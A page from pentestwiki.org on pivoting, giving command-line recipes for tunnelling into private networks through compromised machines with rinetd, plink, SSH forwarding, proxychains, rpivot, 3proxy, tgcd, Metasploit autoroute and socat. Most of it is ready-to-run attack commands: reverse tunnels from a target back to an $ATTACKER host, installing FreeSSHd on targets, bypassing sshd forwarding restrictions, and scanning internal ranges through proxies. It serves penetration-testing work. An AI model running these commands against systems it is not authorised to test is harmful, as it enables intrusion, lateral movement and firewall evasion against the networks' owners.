Pivoting

From pentestwiki.org

rinetd

root #rinetd -f -c rinetd.conf


root #cat rinetd.conf
# bindaddress bindport connectaddress connectport


$PUBLICIP 80 $IP 80


plink.exe

ssh for windows: plink.exe

C:>plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N


ssh / OpenSSH

ssh local port forwarding ("proxy", on the attacker machine)

Local port → Remote server

root #ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
root #ssh -L <localhost port>:<remote IP>:<remote port> $IP



Remote redirection (ssh remote port forwarding ("reverse shell", on a compromised machine))

root #ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP
root #ssh -R <server side port>:<localhost>:<local port> $IP


with ssh -L / -R local mapped ports are always mapped to 127.0.0.1 to map them to eth0/tun0 ifaces, use tgcd or socat!


Open question: How to forward local apache in attacker machine to private LAN network through pivoting


Dynamic port forwarding (socks4/5 proxy)

root #ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>


VPN over SSH

/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes
root #ssh [email protected] -w any:any


Routing not automatic, add routes and gateway. Also on server, ip forwarding

proxychains

From compromised machine (hax0r user)

root #ssh -f -N -R 2222:127.0.0.1:22 [email protected]
root #ssh -f -N -D 127.0.0.1:8080 -p 2222 [email protected]


Edit /etc/proxychains.conf

[ProxyList]
socks4   127.0.0.1   8080


proxychains only allows TCP connect traffic!!!! And incredibly slow!

root #proxychains nmap --top-ports=20 -sT -Pn $IP/24


For proxying DNS change /usr/lib/proxychains3/proxyresolv.

FreeSSHd.exe

Good to install on target for pivoting!!



tinyproxy

https://github.com/tinyproxy/tinyproxy


rpivot

  • Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
  • Server should be started on pentester's machine and listen to incoming connections from the client.
  • Python but no dependencies


Pentester machine (listener):

$python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP


Target machine (if egress traffic not firewalled)

$python client.py --server-ip $IP --server-port 9900


3proxy

On target: (Can bypass target sshd tcp forwarding restrictions)

For SOCKS proxy:

$cat 3proxy.config
socks -p1080 # socks proxy


For port redirection:

$cat 3proxy.config
tcppm <localport> <targethost> <targetport>


Run:

$./3proxy 3proxy.config &


tgcd

tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
This can also be used by network analysts and security experts for penetration testing and analyze the security of their network.

	This program has 3 different modes:

	- CC (ConnectConnect)
	- LL (ListenListen)
	- PF (PortForwarder)

	CC and LL nodes are used together to provide access to a service inside a Local 
	Area Network to the external network. PF node is, however, only a simple
	port forwarder.


On attacker (Do not support VPN):

$tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10


On target:

$tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10


Metasploit

msf> use auxiliary/server/socks4a
msf> run -j

or

meterpreter> run autoroute -s $IP/24
meterpreter > run autoroute -p

or

msf exploit(handler) > route add $IP 255.255.255.0 1

ssf

socat

  • Socat TCP GENDER CHANGER

On inside LAN server:

root #socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80


On outside LAN client:

root #socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10


Connect with outside client:


  • Socat SSH encapsulation into SSL

On server:

root #socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'


on client:

root #ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVER


  • Socat SSH deception (Bounds back to the client ssh server)
root #socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"

Source: https://twitter.com/climagic/status/1079026659435704320


See also socat

References: